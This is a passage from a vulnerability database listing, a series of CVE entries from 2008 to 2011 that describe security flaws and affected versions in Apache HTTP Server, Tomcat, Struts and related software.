13464| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
13465| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
13466| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
13467| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
13468| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
13469| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
13470| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
13471| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
13472| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
13473| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
13474| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
13475| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
13476| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
13477| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
13478| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
13479| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13480| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
13481| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
13482| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
13483| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
13484| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
13485| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
13486| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
13487| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
13488| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
13489| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
13490| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
13491| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
13492| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
13493| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
13494| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
13495| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
13496| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
13497| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
13498| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
13499| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
13500| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
13501| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
13502| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
13503| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
13504| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
13505| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
13506| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
13507| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
13508| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
13509| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
13510| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
13511| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
13512| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
13513| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
13514| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
13515| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
13516| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
13517| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
13518| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
13519| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
13520| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13521| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
13522| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
13523| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
13524| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
13525| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
13526| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
13527| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
13528| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
13529| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
13530| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
13531| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
13532| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
13533| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
13534| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
13535| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
13536| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
13537| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
13538| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
13539| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
13540| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
13541| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
13542| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
13543| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
13544| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
13545| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
13546| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
13547| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
13548| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
13549| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
13550| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
13551| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
13552| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
13553| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
13554| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
13555| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
13556| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
13557| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
13558| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
13559| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
13560| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
13561| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
13562| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
13563| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
13564| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
13565| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
13566| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
13567| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
13568| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
13569| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
